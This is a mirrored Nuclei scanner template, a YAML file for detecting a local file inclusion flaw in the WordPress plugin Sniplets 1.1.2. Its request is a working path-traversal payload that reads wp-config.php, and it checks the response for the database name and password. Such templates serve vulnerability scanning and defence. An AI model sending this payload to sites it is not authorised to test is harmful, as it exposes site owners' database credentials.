mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-17 08:03:32 +08:00
* info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
28 lines
575 B
YAML
28 lines
575 B
YAML
id: sniplets-lfi
|
|
|
|
info:
|
|
name: Wordpress Plugin Sniplets 1.1.2 - LFI
|
|
author: dhiyaneshDK
|
|
severity: high
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/5194
|
|
tags: wordpress,wp-plugin,lfi,wp
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "DB_NAME"
|
|
- "DB_PASSWORD"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|